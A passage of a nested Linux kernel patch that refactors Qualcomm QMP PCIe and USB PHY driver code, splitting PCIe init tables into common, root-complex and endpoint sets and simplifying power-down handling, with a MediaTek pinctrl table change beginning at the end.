++		.serdes		= sm8450_qmp_gen4x2_pcie_serdes_tbl,
++		.serdes_num	= ARRAY_SIZE(sm8450_qmp_gen4x2_pcie_serdes_tbl),
++		.tx		= sm8450_qmp_gen4x2_pcie_tx_tbl,
++		.tx_num		= ARRAY_SIZE(sm8450_qmp_gen4x2_pcie_tx_tbl),
++		.rx		= sm8450_qmp_gen4x2_pcie_rx_tbl,
++		.rx_num		= ARRAY_SIZE(sm8450_qmp_gen4x2_pcie_rx_tbl),
++		.pcs		= sm8450_qmp_gen4x2_pcie_pcs_tbl,
++		.pcs_num	= ARRAY_SIZE(sm8450_qmp_gen4x2_pcie_pcs_tbl),
++		.pcs_misc	= sm8450_qmp_gen4x2_pcie_pcs_misc_tbl,
++		.pcs_misc_num	= ARRAY_SIZE(sm8450_qmp_gen4x2_pcie_pcs_misc_tbl),
++	},
++
++	.tables_rc = &(const struct qmp_phy_cfg_tables) {
++		.serdes		= sm8450_qmp_gen4x2_pcie_rc_serdes_tbl,
++		.serdes_num	= ARRAY_SIZE(sm8450_qmp_gen4x2_pcie_rc_serdes_tbl),
++		.pcs_misc	= sm8450_qmp_gen4x2_pcie_rc_pcs_misc_tbl,
++		.pcs_misc_num	= ARRAY_SIZE(sm8450_qmp_gen4x2_pcie_rc_pcs_misc_tbl),
++	},
++
++	.tables_ep = &(const struct qmp_phy_cfg_tables) {
++		.serdes		= sm8450_qmp_gen4x2_pcie_ep_serdes_tbl,
++		.serdes_num	= ARRAY_SIZE(sm8450_qmp_gen4x2_pcie_ep_serdes_tbl),
++		.pcs_misc	= sm8450_qmp_gen4x2_pcie_ep_pcs_misc_tbl,
++		.pcs_misc_num	= ARRAY_SIZE(sm8450_qmp_gen4x2_pcie_ep_pcs_misc_tbl),
++	},
++
+ 	.clk_list		= sdm845_pciephy_clk_l,
+ 	.num_clks		= ARRAY_SIZE(sdm845_pciephy_clk_l),
+ 	.reset_list		= sdm845_pciephy_reset_l,
+@@ -1813,10 +1862,6 @@ static const struct qmp_phy_cfg sm8450_qmp_gen4x2_pciephy_cfg = {
+ 	.start_ctrl             = SERDES_START | PCS_START,
+ 	.pwrdn_ctrl		= SW_PWRDN | REFCLK_DRV_DSBL,
+ 	.phy_status		= PHYSTATUS_4_20,
+-
+-	.has_pwrdn_delay	= true,
+-	.pwrdn_delay_min	= 995,		/* us */
+-	.pwrdn_delay_max	= 1005,		/* us */
+ };
+ 
+ static void qmp_pcie_configure_lane(void __iomem *base,
+@@ -1850,17 +1895,49 @@ static void qmp_pcie_configure(void __iomem *base,
+ 	qmp_pcie_configure_lane(base, regs, tbl, num, 0xff);
+ }
+ 
+-static int qmp_pcie_serdes_init(struct qmp_phy *qphy)
++static void qmp_pcie_serdes_init(struct qmp_phy *qphy, const struct qmp_phy_cfg_tables *tables)
+ {
+ 	const struct qmp_phy_cfg *cfg = qphy->cfg;
+ 	void __iomem *serdes = qphy->serdes;
+-	const struct qmp_phy_init_tbl *serdes_tbl = cfg->serdes_tbl;
+-	int serdes_tbl_num = cfg->serdes_tbl_num;
+ 
+-	qmp_pcie_configure(serdes, cfg->regs, serdes_tbl, serdes_tbl_num);
+-	qmp_pcie_configure(serdes, cfg->regs, cfg->serdes_tbl_sec, cfg->serdes_tbl_num_sec);
++	if (!tables)
++		return;
+ 
+-	return 0;
++	qmp_pcie_configure(serdes, cfg->regs, tables->serdes, tables->serdes_num);
++}
++
++static void qmp_pcie_lanes_init(struct qmp_phy *qphy, const struct qmp_phy_cfg_tables *tables)
++{
++	const struct qmp_phy_cfg *cfg = qphy->cfg;
++	void __iomem *tx = qphy->tx;
++	void __iomem *rx = qphy->rx;
++
++	if (!tables)
++		return;
++
++	qmp_pcie_configure_lane(tx, cfg->regs, tables->tx, tables->tx_num, 1);
++
++	if (cfg->lanes >= 2)
++		qmp_pcie_configure_lane(qphy->tx2, cfg->regs, tables->tx, tables->tx_num, 2);
++
++	qmp_pcie_configure_lane(rx, cfg->regs, tables->rx, tables->rx_num, 1);
++	if (cfg->lanes >= 2)
++		qmp_pcie_configure_lane(qphy->rx2, cfg->regs, tables->rx, tables->rx_num, 2);
++}
++
++static void qmp_pcie_pcs_init(struct qmp_phy *qphy, const struct qmp_phy_cfg_tables *tables)
++{
++	const struct qmp_phy_cfg *cfg = qphy->cfg;
++	void __iomem *pcs = qphy->pcs;
++	void __iomem *pcs_misc = qphy->pcs_misc;
++
++	if (!tables)
++		return;
++
++	qmp_pcie_configure(pcs, cfg->regs,
++			   tables->pcs, tables->pcs_num);
++	qmp_pcie_configure(pcs_misc, cfg->regs,
++			   tables->pcs_misc, tables->pcs_misc_num);
+ }
+ 
+ static int qmp_pcie_init(struct phy *phy)
+@@ -1932,15 +2009,19 @@ static int qmp_pcie_power_on(struct phy *phy)
+ 	struct qmp_phy *qphy = phy_get_drvdata(phy);
+ 	struct qcom_qmp *qmp = qphy->qmp;
+ 	const struct qmp_phy_cfg *cfg = qphy->cfg;
+-	void __iomem *tx = qphy->tx;
+-	void __iomem *rx = qphy->rx;
++	const struct qmp_phy_cfg_tables *mode_tables;
+ 	void __iomem *pcs = qphy->pcs;
+-	void __iomem *pcs_misc = qphy->pcs_misc;
+ 	void __iomem *status;
+ 	unsigned int mask, val, ready;
+ 	int ret;
+ 
+-	qmp_pcie_serdes_init(qphy);
++	if (qphy->mode == PHY_MODE_PCIE_RC)
++		mode_tables = cfg->tables_rc;
++	else
++		mode_tables = cfg->tables_ep;
++
++	qmp_pcie_serdes_init(qphy, &cfg->tables);
++	qmp_pcie_serdes_init(qphy, mode_tables);
+ 
+ 	ret = clk_prepare_enable(qphy->pipe_clk);
+ 	if (ret) {
+@@ -1949,40 +2030,11 @@ static int qmp_pcie_power_on(struct phy *phy)
+ 	}
+ 
+ 	/* Tx, Rx, and PCS configurations */
+-	qmp_pcie_configure_lane(tx, cfg->regs, cfg->tx_tbl, cfg->tx_tbl_num, 1);
+-	qmp_pcie_configure_lane(tx, cfg->regs, cfg->tx_tbl_sec, cfg->tx_tbl_num_sec, 1);
+-
+-	if (cfg->lanes >= 2) {
+-		qmp_pcie_configure_lane(qphy->tx2, cfg->regs, cfg->tx_tbl,
+-					cfg->tx_tbl_num, 2);
+-		qmp_pcie_configure_lane(qphy->tx2, cfg->regs, cfg->tx_tbl_sec,
+-					cfg->tx_tbl_num_sec, 2);
+-	}
+-
+-	qmp_pcie_configure_lane(rx, cfg->regs, cfg->rx_tbl, cfg->rx_tbl_num, 1);
+-	qmp_pcie_configure_lane(rx, cfg->regs, cfg->rx_tbl_sec, cfg->rx_tbl_num_sec, 1);
+-
+-	if (cfg->lanes >= 2) {
+-		qmp_pcie_configure_lane(qphy->rx2, cfg->regs, cfg->rx_tbl,
+-					cfg->rx_tbl_num, 2);
+-		qmp_pcie_configure_lane(qphy->rx2, cfg->regs, cfg->rx_tbl_sec,
+-					cfg->rx_tbl_num_sec, 2);
+-	}
++	qmp_pcie_lanes_init(qphy, &cfg->tables);
++	qmp_pcie_lanes_init(qphy, mode_tables);
+ 
+-	qmp_pcie_configure(pcs, cfg->regs, cfg->pcs_tbl, cfg->pcs_tbl_num);
+-	qmp_pcie_configure(pcs, cfg->regs, cfg->pcs_tbl_sec, cfg->pcs_tbl_num_sec);
+-
+-	qmp_pcie_configure(pcs_misc, cfg->regs, cfg->pcs_misc_tbl, cfg->pcs_misc_tbl_num);
+-	qmp_pcie_configure(pcs_misc, cfg->regs, cfg->pcs_misc_tbl_sec, cfg->pcs_misc_tbl_num_sec);
+-
+-	/*
+-	 * Pull out PHY from POWER DOWN state.
+-	 * This is active low enable signal to power-down PHY.
+-	 */
+-	qphy_setbits(pcs, QPHY_V2_PCS_POWER_DOWN_CONTROL, cfg->pwrdn_ctrl);
+-
+-	if (cfg->has_pwrdn_delay)
+-		usleep_range(cfg->pwrdn_delay_min, cfg->pwrdn_delay_max);
++	qmp_pcie_pcs_init(qphy, &cfg->tables);
++	qmp_pcie_pcs_init(qphy, mode_tables);
+ 
+ 	/* Pull PHY out of reset state */
+ 	qphy_clrbits(pcs, cfg->regs[QPHY_SW_RESET], SW_RESET);
+@@ -1990,6 +2042,9 @@ static int qmp_pcie_power_on(struct phy *phy)
+ 	/* start SerDes and Phy-Coding-Sublayer */
+ 	qphy_setbits(pcs, cfg->regs[QPHY_START_CTRL], cfg->start_ctrl);
+ 
++	if (!cfg->skip_start_delay)
++		usleep_range(1000, 1200);
++
+ 	status = pcs + cfg->regs[QPHY_PCS_STATUS];
+ 	mask = cfg->phy_status;
+ 	ready = 0;
+@@ -2060,6 +2115,23 @@ static int qmp_pcie_disable(struct phy *phy)
+ 	return qmp_pcie_exit(phy);
+ }
+ 
++static int qmp_pcie_set_mode(struct phy *phy, enum phy_mode mode, int submode)
++{
++	struct qmp_phy *qphy = phy_get_drvdata(phy);
++
++	switch (submode) {
++	case PHY_MODE_PCIE_RC:
++	case PHY_MODE_PCIE_EP:
++		qphy->mode = submode;
++		break;
++	default:
++		dev_err(&phy->dev, "Unsupported submode %d\n", submode);
++		return -EINVAL;
++	}
++
++	return 0;
++}
++
+ static int qmp_pcie_vreg_init(struct device *dev, const struct qmp_phy_cfg *cfg)
+ {
+ 	struct qcom_qmp *qmp = dev_get_drvdata(dev);
+@@ -2183,6 +2255,7 @@ static int phy_pipe_clk_register(struct qcom_qmp *qmp, struct device_node *np)
+ static const struct phy_ops qmp_pcie_ops = {
+ 	.power_on	= qmp_pcie_enable,
+ 	.power_off	= qmp_pcie_disable,
++	.set_mode	= qmp_pcie_set_mode,
+ 	.owner		= THIS_MODULE,
+ };
+ 
+@@ -2198,6 +2271,8 @@ static int qmp_pcie_create(struct device *dev, struct device_node *np, int id,
+ 	if (!qphy)
+ 		return -ENOMEM;
+ 
++	qphy->mode = PHY_MODE_PCIE_RC;
++
+ 	qphy->cfg = cfg;
+ 	qphy->serdes = serdes;
+ 	/*
+@@ -2240,7 +2315,9 @@ static int qmp_pcie_create(struct device *dev, struct device_node *np, int id,
+ 		qphy->pcs_misc = qphy->pcs + 0x400;
+ 
+ 	if (IS_ERR(qphy->pcs_misc)) {
+-		if (cfg->pcs_misc_tbl || cfg->pcs_misc_tbl_sec)
++		if (cfg->tables.pcs_misc ||
++		    (cfg->tables_rc && cfg->tables_rc->pcs_misc) ||
++		    (cfg->tables_ep && cfg->tables_ep->pcs_misc))
+ 			return PTR_ERR(qphy->pcs_misc);
+ 	}
+ 
+diff --git a/drivers/phy/qualcomm/phy-qcom-qmp-pcs-pcie-v5_20.h b/drivers/phy/qualcomm/phy-qcom-qmp-pcs-pcie-v5_20.h
+index 1eedf50cf9cbc..3d9713d348fe6 100644
+--- a/drivers/phy/qualcomm/phy-qcom-qmp-pcs-pcie-v5_20.h
++++ b/drivers/phy/qualcomm/phy-qcom-qmp-pcs-pcie-v5_20.h
+@@ -8,8 +8,10 @@
+ 
+ /* Only for QMP V5_20 PHY - PCIe PCS registers */
+ #define QPHY_V5_20_PCS_PCIE_ENDPOINT_REFCLK_DRIVE	0x01c
++#define QPHY_V5_20_PCS_PCIE_OSC_DTCT_MODE2_CONFIG5	0x084
+ #define QPHY_V5_20_PCS_PCIE_OSC_DTCT_ACTIONS		0x090
+ #define QPHY_V5_20_PCS_PCIE_EQ_CONFIG1			0x0a0
++#define QPHY_V5_20_PCS_PCIE_PRESET_P10_POST		0x0e0
+ #define QPHY_V5_20_PCS_PCIE_G4_EQ_CONFIG5		0x108
+ #define QPHY_V5_20_PCS_PCIE_G4_PRE_GAIN			0x15c
+ #define QPHY_V5_20_PCS_PCIE_RX_MARGINING_CONFIG3	0x184
+diff --git a/drivers/phy/qualcomm/phy-qcom-qmp-pcs-v5_20.h b/drivers/phy/qualcomm/phy-qcom-qmp-pcs-v5_20.h
+new file mode 100644
+index 0000000000000..9a5a20daf62cd
+--- /dev/null
++++ b/drivers/phy/qualcomm/phy-qcom-qmp-pcs-v5_20.h
+@@ -0,0 +1,14 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++/*
++ * Copyright (c) 2022, Linaro Ltd.
++ */
++
++#ifndef QCOM_PHY_QMP_PCS_V5_20_H_
++#define QCOM_PHY_QMP_PCS_V5_20_H_
++
++#define QPHY_V5_20_PCS_G3S2_PRE_GAIN			0x170
++#define QPHY_V5_20_PCS_RX_SIGDET_LVL			0x188
++#define QPHY_V5_20_PCS_EQ_CONFIG4			0x1e0
++#define QPHY_V5_20_PCS_EQ_CONFIG5			0x1e4
++
++#endif
+diff --git a/drivers/phy/qualcomm/phy-qcom-qmp-usb.c b/drivers/phy/qualcomm/phy-qcom-qmp-usb.c
+index b84c0d4b57541..f0ba35bb73c1b 100644
+--- a/drivers/phy/qualcomm/phy-qcom-qmp-usb.c
++++ b/drivers/phy/qualcomm/phy-qcom-qmp-usb.c
+@@ -63,8 +63,6 @@
+ #define CLAMP_EN				BIT(0) /* enables i/o clamp_n */
+ 
+ #define PHY_INIT_COMPLETE_TIMEOUT		10000
+-#define POWER_DOWN_DELAY_US_MIN			10
+-#define POWER_DOWN_DELAY_US_MAX			11
+ 
+ struct qmp_phy_init_tbl {
+ 	unsigned int offset;
+@@ -126,6 +124,7 @@ static const unsigned int usb3phy_regs_layout[QPHY_LAYOUT_SIZE] = {
+ 	[QPHY_PCS_AUTONOMOUS_MODE_CTRL]	= 0x0d4,
+ 	[QPHY_PCS_LFPS_RXTERM_IRQ_CLEAR]  = 0x0d8,
+ 	[QPHY_PCS_LFPS_RXTERM_IRQ_STATUS] = 0x178,
++	[QPHY_PCS_POWER_DOWN_CONTROL]	= 0x04,
+ };
+ 
+ static const unsigned int qmp_v3_usb3phy_regs_layout[QPHY_LAYOUT_SIZE] = {
+@@ -135,6 +134,7 @@ static const unsigned int qmp_v3_usb3phy_regs_layout[QPHY_LAYOUT_SIZE] = {
+ 	[QPHY_PCS_AUTONOMOUS_MODE_CTRL]	= 0x0d8,
+ 	[QPHY_PCS_LFPS_RXTERM_IRQ_CLEAR]  = 0x0dc,
+ 	[QPHY_PCS_LFPS_RXTERM_IRQ_STATUS] = 0x170,
++	[QPHY_PCS_POWER_DOWN_CONTROL]	= 0x04,
+ };
+ 
+ static const unsigned int qmp_v4_usb3phy_regs_layout[QPHY_LAYOUT_SIZE] = {
+@@ -1456,16 +1456,8 @@ struct qmp_phy_cfg {
+ 	/* array of registers with different offsets */
+ 	const unsigned int *regs;
+ 
+-	unsigned int start_ctrl;
+-	unsigned int pwrdn_ctrl;
+-	/* bit offset of PHYSTATUS in QPHY_PCS_STATUS register */
+-	unsigned int phy_status;
+-
+ 	/* true, if PHY needs delay after POWER_DOWN */
+ 	bool has_pwrdn_delay;
+-	/* power_down delay in usec */
+-	int pwrdn_delay_min;
+-	int pwrdn_delay_max;
+ 
+ 	/* true, if PHY has a separate DP_COM control block */
+ 	bool has_phy_dp_com_ctrl;
+@@ -1616,11 +1608,7 @@ static const struct qmp_phy_cfg ipq8074_usb3phy_cfg = {
+ 	.num_resets		= ARRAY_SIZE(msm8996_usb3phy_reset_l),
+ 	.vreg_list		= qmp_phy_vreg_l,
+ 	.num_vregs		= ARRAY_SIZE(qmp_phy_vreg_l),
+-	.regs			= usb3phy_regs_layout,
+-
+-	.start_ctrl		= SERDES_START | PCS_START,
+-	.pwrdn_ctrl		= SW_PWRDN,
+-	.phy_status		= PHYSTATUS,
++	.regs			= qmp_v3_usb3phy_regs_layout,
+ };
+ 
+ static const struct qmp_phy_cfg msm8996_usb3phy_cfg = {
+@@ -1641,10 +1629,6 @@ static const struct qmp_phy_cfg msm8996_usb3phy_cfg = {
+ 	.vreg_list		= qmp_phy_vreg_l,
+ 	.num_vregs		= ARRAY_SIZE(qmp_phy_vreg_l),
+ 	.regs			= usb3phy_regs_layout,
+-
+-	.start_ctrl		= SERDES_START | PCS_START,
+-	.pwrdn_ctrl		= SW_PWRDN,
+-	.phy_status		= PHYSTATUS,
+ };
+ 
+ static const struct qmp_phy_cfg qmp_v3_usb3phy_cfg = {
+@@ -1666,14 +1650,7 @@ static const struct qmp_phy_cfg qmp_v3_usb3phy_cfg = {
+ 	.num_vregs		= ARRAY_SIZE(qmp_phy_vreg_l),
+ 	.regs			= qmp_v3_usb3phy_regs_layout,
+ 
+-	.start_ctrl		= SERDES_START | PCS_START,
+-	.pwrdn_ctrl		= SW_PWRDN,
+-	.phy_status		= PHYSTATUS,
+-
+ 	.has_pwrdn_delay	= true,
+-	.pwrdn_delay_min	= POWER_DOWN_DELAY_US_MIN,
+-	.pwrdn_delay_max	= POWER_DOWN_DELAY_US_MAX,
+-
+ 	.has_phy_dp_com_ctrl	= true,
+ };
+ 
+@@ -1696,14 +1673,7 @@ static const struct qmp_phy_cfg sc7180_usb3phy_cfg = {
+ 	.num_vregs		= ARRAY_SIZE(qmp_phy_vreg_l),
+ 	.regs			= qmp_v3_usb3phy_regs_layout,
+ 
+-	.start_ctrl		= SERDES_START | PCS_START,
+-	.pwrdn_ctrl		= SW_PWRDN,
+-	.phy_status		= PHYSTATUS,
+-
+ 	.has_pwrdn_delay	= true,
+-	.pwrdn_delay_min	= POWER_DOWN_DELAY_US_MIN,
+-	.pwrdn_delay_max	= POWER_DOWN_DELAY_US_MAX,
+-
+ 	.has_phy_dp_com_ctrl	= true,
+ };
+ 
+@@ -1725,14 +1695,7 @@ static const struct qmp_phy_cfg sc8280xp_usb3_uniphy_cfg = {
+ 	.vreg_list		= qmp_phy_vreg_l,
+ 	.num_vregs		= ARRAY_SIZE(qmp_phy_vreg_l),
+ 	.regs			= qmp_v4_usb3phy_regs_layout,
+-
+-	.start_ctrl		= SERDES_START | PCS_START,
+-	.pwrdn_ctrl		= SW_PWRDN,
+-	.phy_status		= PHYSTATUS,
+-
+-	.has_pwrdn_delay	= true,
+-	.pwrdn_delay_min	= POWER_DOWN_DELAY_US_MIN,
+-	.pwrdn_delay_max	= POWER_DOWN_DELAY_US_MAX,
++	.pcs_usb_offset		= 0x1000,
+ };
+ 
+ static const struct qmp_phy_cfg qmp_v3_usb3_uniphy_cfg = {
+@@ -1754,13 +1717,7 @@ static const struct qmp_phy_cfg qmp_v3_usb3_uniphy_cfg = {
+ 	.num_vregs		= ARRAY_SIZE(qmp_phy_vreg_l),
+ 	.regs			= qmp_v3_usb3phy_regs_layout,
+ 
+-	.start_ctrl		= SERDES_START | PCS_START,
+-	.pwrdn_ctrl		= SW_PWRDN,
+-	.phy_status		= PHYSTATUS,
+-
+ 	.has_pwrdn_delay	= true,
+-	.pwrdn_delay_min	= POWER_DOWN_DELAY_US_MIN,
+-	.pwrdn_delay_max	= POWER_DOWN_DELAY_US_MAX,
+ };
+ 
+ static const struct qmp_phy_cfg msm8998_usb3phy_cfg = {
+@@ -1781,10 +1738,6 @@ static const struct qmp_phy_cfg msm8998_usb3phy_cfg = {
+ 	.vreg_list              = qmp_phy_vreg_l,
+ 	.num_vregs              = ARRAY_SIZE(qmp_phy_vreg_l),
+ 	.regs                   = qmp_v3_usb3phy_regs_layout,
+-
+-	.start_ctrl             = SERDES_START | PCS_START,
+-	.pwrdn_ctrl             = SW_PWRDN,
+-	.phy_status		= PHYSTATUS,
+ };
+ 
+ static const struct qmp_phy_cfg sm8150_usb3phy_cfg = {
+@@ -1809,15 +1762,7 @@ static const struct qmp_phy_cfg sm8150_usb3phy_cfg = {
+ 	.regs			= qmp_v4_usb3phy_regs_layout,
+ 	.pcs_usb_offset		= 0x300,
+ 
+-	.start_ctrl		= SERDES_START | PCS_START,
+-	.pwrdn_ctrl		= SW_PWRDN,
+-	.phy_status		= PHYSTATUS,
+-
+-
+ 	.has_pwrdn_delay	= true,
+-	.pwrdn_delay_min	= POWER_DOWN_DELAY_US_MIN,
+-	.pwrdn_delay_max	= POWER_DOWN_DELAY_US_MAX,
+-
+ 	.has_phy_dp_com_ctrl	= true,
+ };
+ 
+@@ -1843,13 +1788,7 @@ static const struct qmp_phy_cfg sm8150_usb3_uniphy_cfg = {
+ 	.regs			= qmp_v4_usb3phy_regs_layout,
+ 	.pcs_usb_offset		= 0x600,
+ 
+-	.start_ctrl		= SERDES_START | PCS_START,
+-	.pwrdn_ctrl		= SW_PWRDN,
+-	.phy_status		= PHYSTATUS,
+-
+ 	.has_pwrdn_delay	= true,
+-	.pwrdn_delay_min	= POWER_DOWN_DELAY_US_MIN,
+-	.pwrdn_delay_max	= POWER_DOWN_DELAY_US_MAX,
+ };
+ 
+ static const struct qmp_phy_cfg sm8250_usb3phy_cfg = {
+@@ -1874,14 +1813,7 @@ static const struct qmp_phy_cfg sm8250_usb3phy_cfg = {
+ 	.regs			= qmp_v4_usb3phy_regs_layout,
+ 	.pcs_usb_offset		= 0x300,
+ 
+-	.start_ctrl		= SERDES_START | PCS_START,
+-	.pwrdn_ctrl		= SW_PWRDN,
+-	.phy_status		= PHYSTATUS,
+-
+ 	.has_pwrdn_delay	= true,
+-	.pwrdn_delay_min	= POWER_DOWN_DELAY_US_MIN,
+-	.pwrdn_delay_max	= POWER_DOWN_DELAY_US_MAX,
+-
+ 	.has_phy_dp_com_ctrl	= true,
+ };
+ 
+@@ -1907,13 +1839,7 @@ static const struct qmp_phy_cfg sm8250_usb3_uniphy_cfg = {
+ 	.regs			= qmp_v4_usb3phy_regs_layout,
+ 	.pcs_usb_offset		= 0x600,
+ 
+-	.start_ctrl		= SERDES_START | PCS_START,
+-	.pwrdn_ctrl		= SW_PWRDN,
+-	.phy_status		= PHYSTATUS,
+-
+ 	.has_pwrdn_delay	= true,
+-	.pwrdn_delay_min	= POWER_DOWN_DELAY_US_MIN,
+-	.pwrdn_delay_max	= POWER_DOWN_DELAY_US_MAX,
+ };
+ 
+ static const struct qmp_phy_cfg sdx55_usb3_uniphy_cfg = {
+@@ -1938,13 +1864,7 @@ static const struct qmp_phy_cfg sdx55_usb3_uniphy_cfg = {
+ 	.regs			= qmp_v4_usb3phy_regs_layout,
+ 	.pcs_usb_offset		= 0x600,
+ 
+-	.start_ctrl		= SERDES_START | PCS_START,
+-	.pwrdn_ctrl		= SW_PWRDN,
+-	.phy_status		= PHYSTATUS,
+-
+ 	.has_pwrdn_delay	= true,
+-	.pwrdn_delay_min	= POWER_DOWN_DELAY_US_MIN,
+-	.pwrdn_delay_max	= POWER_DOWN_DELAY_US_MAX,
+ };
+ 
+ static const struct qmp_phy_cfg sdx65_usb3_uniphy_cfg = {
+@@ -1969,13 +1889,7 @@ static const struct qmp_phy_cfg sdx65_usb3_uniphy_cfg = {
+ 	.regs			= qmp_v4_usb3phy_regs_layout,
+ 	.pcs_usb_offset		= 0x1000,
+ 
+-	.start_ctrl		= SERDES_START | PCS_START,
+-	.pwrdn_ctrl		= SW_PWRDN,
+-	.phy_status		= PHYSTATUS,
+-
+ 	.has_pwrdn_delay	= true,
+-	.pwrdn_delay_min	= POWER_DOWN_DELAY_US_MIN,
+-	.pwrdn_delay_max	= POWER_DOWN_DELAY_US_MAX,
+ };
+ 
+ static const struct qmp_phy_cfg sm8350_usb3phy_cfg = {
+@@ -2000,14 +1914,7 @@ static const struct qmp_phy_cfg sm8350_usb3phy_cfg = {
+ 	.regs			= qmp_v4_usb3phy_regs_layout,
+ 	.pcs_usb_offset		= 0x300,
+ 
+-	.start_ctrl		= SERDES_START | PCS_START,
+-	.pwrdn_ctrl		= SW_PWRDN,
+-	.phy_status		= PHYSTATUS,
+-
+ 	.has_pwrdn_delay	= true,
+-	.pwrdn_delay_min	= POWER_DOWN_DELAY_US_MIN,
+-	.pwrdn_delay_max	= POWER_DOWN_DELAY_US_MAX,
+-
+ 	.has_phy_dp_com_ctrl	= true,
+ };
+ 
+@@ -2033,13 +1940,7 @@ static const struct qmp_phy_cfg sm8350_usb3_uniphy_cfg = {
+ 	.regs			= qmp_v4_usb3phy_regs_layout,
+ 	.pcs_usb_offset		= 0x1000,
+ 
+-	.start_ctrl		= SERDES_START | PCS_START,
+-	.pwrdn_ctrl		= SW_PWRDN,
+-	.phy_status		= PHYSTATUS,
+-
+ 	.has_pwrdn_delay	= true,
+-	.pwrdn_delay_min	= POWER_DOWN_DELAY_US_MIN,
+-	.pwrdn_delay_max	= POWER_DOWN_DELAY_US_MAX,
+ };
+ 
+ static const struct qmp_phy_cfg qcm2290_usb3phy_cfg = {
+@@ -2060,10 +1961,6 @@ static const struct qmp_phy_cfg qcm2290_usb3phy_cfg = {
+ 	.vreg_list		= qmp_phy_vreg_l,
+ 	.num_vregs		= ARRAY_SIZE(qmp_phy_vreg_l),
+ 	.regs			= qcm2290_usb3phy_regs_layout,
+-
+-	.start_ctrl		= SERDES_START | PCS_START,
+-	.pwrdn_ctrl		= SW_PWRDN,
+-	.phy_status		= PHYSTATUS,
+ };
+ 
+ static void qmp_usb_configure_lane(void __iomem *base,
+@@ -2164,13 +2061,7 @@ static int qmp_usb_init(struct phy *phy)
+ 		qphy_clrbits(dp_com, QPHY_V3_DP_COM_SW_RESET, SW_RESET);
+ 	}
+ 
+-	if (cfg->regs[QPHY_PCS_POWER_DOWN_CONTROL])
+-		qphy_setbits(pcs,
+-			     cfg->regs[QPHY_PCS_POWER_DOWN_CONTROL],
+-			     cfg->pwrdn_ctrl);
+-	else
+-		qphy_setbits(pcs, QPHY_V2_PCS_POWER_DOWN_CONTROL,
+-			     cfg->pwrdn_ctrl);
++	qphy_setbits(pcs, cfg->regs[QPHY_PCS_POWER_DOWN_CONTROL], SW_PWRDN);
+ 
+ 	return 0;
+ 
+@@ -2206,7 +2097,7 @@ static int qmp_usb_power_on(struct phy *phy)
+ 	void __iomem *rx = qphy->rx;
+ 	void __iomem *pcs = qphy->pcs;
+ 	void __iomem *status;
+-	unsigned int mask, val, ready;
++	unsigned int val;
+ 	int ret;
+ 
+ 	qmp_usb_serdes_init(qphy);
+@@ -2236,19 +2127,16 @@ static int qmp_usb_power_on(struct phy *phy)
+ 	qmp_usb_configure(pcs, cfg->regs, cfg->pcs_tbl, cfg->pcs_tbl_num);
+ 
+ 	if (cfg->has_pwrdn_delay)
+-		usleep_range(cfg->pwrdn_delay_min, cfg->pwrdn_delay_max);
++		usleep_range(10, 20);
+ 
+ 	/* Pull PHY out of reset state */
+ 	qphy_clrbits(pcs, cfg->regs[QPHY_SW_RESET], SW_RESET);
+ 
+ 	/* start SerDes and Phy-Coding-Sublayer */
+-	qphy_setbits(pcs, cfg->regs[QPHY_START_CTRL], cfg->start_ctrl);
++	qphy_setbits(pcs, cfg->regs[QPHY_START_CTRL], SERDES_START | PCS_START);
+ 
+ 	status = pcs + cfg->regs[QPHY_PCS_STATUS];
+-	mask = cfg->phy_status;
+-	ready = 0;
+-
+-	ret = readl_poll_timeout(status, val, (val & mask) == ready, 10,
++	ret = readl_poll_timeout(status, val, !(val & PHYSTATUS), 10,
+ 				 PHY_INIT_COMPLETE_TIMEOUT);
+ 	if (ret) {
+ 		dev_err(qmp->dev, "phy initialization timed-out\n");
+@@ -2274,16 +2162,12 @@ static int qmp_usb_power_off(struct phy *phy)
+ 	qphy_setbits(qphy->pcs, cfg->regs[QPHY_SW_RESET], SW_RESET);
+ 
+ 	/* stop SerDes and Phy-Coding-Sublayer */
+-	qphy_clrbits(qphy->pcs, cfg->regs[QPHY_START_CTRL], cfg->start_ctrl);
++	qphy_clrbits(qphy->pcs, cfg->regs[QPHY_START_CTRL],
++			SERDES_START | PCS_START);
+ 
+ 	/* Put PHY into POWER DOWN state: active low */
+-	if (cfg->regs[QPHY_PCS_POWER_DOWN_CONTROL]) {
+-		qphy_clrbits(qphy->pcs, cfg->regs[QPHY_PCS_POWER_DOWN_CONTROL],
+-			     cfg->pwrdn_ctrl);
+-	} else {
+-		qphy_clrbits(qphy->pcs, QPHY_V2_PCS_POWER_DOWN_CONTROL,
+-				cfg->pwrdn_ctrl);
+-	}
++	qphy_clrbits(qphy->pcs, cfg->regs[QPHY_PCS_POWER_DOWN_CONTROL],
++			SW_PWRDN);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/phy/qualcomm/phy-qcom-qmp.h b/drivers/phy/qualcomm/phy-qcom-qmp.h
+index 26274e3c0cf95..29a48f0436d2a 100644
+--- a/drivers/phy/qualcomm/phy-qcom-qmp.h
++++ b/drivers/phy/qualcomm/phy-qcom-qmp.h
+@@ -38,6 +38,7 @@
+ #include "phy-qcom-qmp-pcs-pcie-v4_20.h"
+ 
+ #include "phy-qcom-qmp-pcs-v5.h"
++#include "phy-qcom-qmp-pcs-v5_20.h"
+ #include "phy-qcom-qmp-pcs-pcie-v5.h"
+ #include "phy-qcom-qmp-pcs-usb-v5.h"
+ #include "phy-qcom-qmp-pcs-ufs-v5.h"
+diff --git a/drivers/pinctrl/mediatek/pinctrl-mt7986.c b/drivers/pinctrl/mediatek/pinctrl-mt7986.c
+index 50cb736f9f116..b587299697481 100644
+--- a/drivers/pinctrl/mediatek/pinctrl-mt7986.c
++++ b/drivers/pinctrl/mediatek/pinctrl-mt7986.c
+@@ -316,10 +316,10 @@ static const struct mtk_pin_field_calc mt7986_pin_pupd_range[] = {
+ 	PIN_FIELD_BASE(38, 38, IOCFG_LT_BASE, 0x30, 0x10, 9, 1),
+ 	PIN_FIELD_BASE(39, 40, IOCFG_RB_BASE, 0x60, 0x10, 18, 1),
+ 	PIN_FIELD_BASE(41, 41, IOCFG_RB_BASE, 0x60, 0x10, 12, 1),
+-	PIN_FIELD_BASE(42, 43, IOCFG_RB_BASE, 0x60, 0x10, 22, 1),
+-	PIN_FIELD_BASE(44, 45, IOCFG_RB_BASE, 0x60, 0x10, 20, 1),
+-	PIN_FIELD_BASE(46, 47, IOCFG_RB_BASE, 0x60, 0x10, 26, 1),
+-	PIN_FIELD_BASE(48, 49, IOCFG_RB_BASE, 0x60, 0x10, 24, 1),
